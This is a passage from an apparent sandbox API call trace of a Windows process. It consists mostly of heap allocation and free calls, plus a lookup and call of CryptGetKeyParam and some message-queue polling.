Size=0x10) returned 0x43caa30 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0095.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0095.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0095.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0095.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0095.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0095.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0095.522] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0095.522] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e27f0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27f0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0095.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0095.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0095.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.574] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.574] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.574] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 